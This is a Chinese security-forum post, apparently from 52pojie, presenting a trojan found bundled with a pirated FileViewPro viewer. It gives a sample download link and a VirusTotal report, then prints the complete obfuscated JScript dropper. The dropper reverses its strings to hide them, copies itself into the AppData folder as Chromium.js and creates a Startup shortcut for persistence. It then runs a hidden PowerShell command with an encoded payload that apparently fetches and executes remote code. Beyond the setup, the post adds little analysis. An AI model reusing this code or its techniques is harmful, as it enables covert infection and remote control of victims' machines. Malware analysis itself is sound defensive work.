[PC样本分析] 新人分析 - 〖系统安全〗

z3960

级别: FLY版主

发帖: 786303

飞翔币: 211574

威望: 215717

飞扬币: 2615486

信誉值: 8

只看楼主更多操作 0 发表于: 2022-01-08

FileViewPro 万能查看器绿色版https://www.52pojie.cn/thread-1059431-1-1.html(出处: 吾爱破解论坛)样本连接：https://wwi.lanzouw.com/im1KLya83mh 密码:52pj@三木森啊该用户上传的软件捆绑木马病毒，通过360查出在线查毒：https://www.virustotal.com/gui/file/a8bb13a0dcec03fb452a53e985285b74c511eb7daacb9daa22dbb647705fba9b接下来开始进行解包

[JavaScript] 纯文本查看复制代码

?[tr=none]

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

ERUJHTSETJSEJSEA = function(ObjN) { ResName = new ActiveXObject(ObjN); return ResName;};WScript.Sleep(5005);function ASDGHKFIASYLWGHAfi(str) { splitString = str.split(""); reverseArray = splitString.reverse(); joinArray = reverseArray.join(""); return joinArray;}; aq = ASDGHKFIASYLWGHAfi("sj.muimorhC\atadppa\"); WScript.Sleep(2002); SETYa = ASDGHKFIASYLWGHAfi("tAFIFcejAFIFbOmetAFIFsySelAFIFiF.gAFIFniAFIFtpirAFIFcS"); SETYaa = SETYa.replace(/FIFA/g, ''); fso=WScript.CreateObject (SETYaa); zr = fso.FileExists(aq); if (zr == false) { WScript.Sleep(2002);SETYs = ASDGHKFIASYLWGHAfi("llAFIFeAFIFhS.tpiAFIFrcAFIFSW"); SETYss = SETYs.replace(/FIFA/g, ''); wscr = new ERUJHTSETJSEJSEA(SETYss); fso.CopyFile (WScript.ScriptFullName, wscr.ExpandEnvironmentStrings(ASDGHKFIASYLWGHAfi("%ELIFORPRESU%")) + aq , true); WScript.Sleep(8008); link = wscr.SpecialFolders(ASDGHKFIASYLWGHAfi("putratS"))+ASDGHKFIASYLWGHAfi("\")+ASDGHKFIASYLWGHAfi("knl.ini.muimorhC"); shortcut = wscr.CreateShortcut(link); shortcut.TargetPath = ASDGHKFIASYLWGHAfi("%ELIFORPRESU%") + aq; shortcut.Arguments = ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi(""));WScript.Sleep(1000);shortcut.Description = ASDGHKFIASYLWGHAfi("ini.muimorhC"); shortcut.IconLocation = ASDGHKFIASYLWGHAfi("96,lld.23LLEHS\23metsys\%tooRmetsyS%"); shortcut.WindowStyle = 4; shortcut.Save(); } WScript.Sleep(8008);try { setTimeout(ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi("")),888); } catch(f) {SETYy = ASDGHKFIASYLWGHAfi("eAFIFxAFIFeAFIF.lAFIFleAFIFhsAFIFrewAFIFoPAFIF"); SETYyy = SETYy.replace(/FIFA/g, '');C=SETYyy; BB=ASDGHKFIASYLWGHAfi(" e- tixeon- "); SD=ASDGHKFIASYLWGHAfi("wGADBgYAUGAXBgLAQHAlBgTAcCAgAAdAMGAlBgaAIGAPBQLAcHAlBgTAgCAoAwZA4GApBgcAQHATBANAYDAlBwcAEGAiBQbA8GAyBgRAoDA6AQXAQHAyBQZAYHAuBwbAMEAbBAKAQGAhBwbAwEAuAgbAkGAhBQbA8GAEBAdA4GAlBgcAIHA1BwQAoDA6AQXA4GApBQYA0GAvBARAAHAwBQQAsFAgAwOAgDAgAAcAUGAlBAbAMHAgAAI"); SV=ASDGHKFIASYLWGHAfi("GAwBQZAIHAuAQKAcCAzAAcA0GAuAgYA8CA0BQaAIGAvAQZAMGAhBAcAMHAuAgaAMHAzBQaAMHAvAwLAoDAwBAdAQHAoBwJAgCAnAwZA4GApBgcAQHATBAZAEGAvBAbA4GA3BwbAQEAnAgLAkCAnAAdA4GAlBQaA"); SF=ASDGHKFIASYLWGHAfi("AkCAsBAbAUHAuBAJAwCAsBAbAUHAuBAJAgCAlBwaA8GA2BgbAkGAuAAdA4GApBwbAAFA5BgcAQHAuBQRA4CApAQKAkCAnAQQAcCAsAwJA4HAhAgKA4FAnAAKAUGAjBQYAw"); wscr.Run(C+BB+SD+SV+SF,0,false); };

木马文件就是ID.js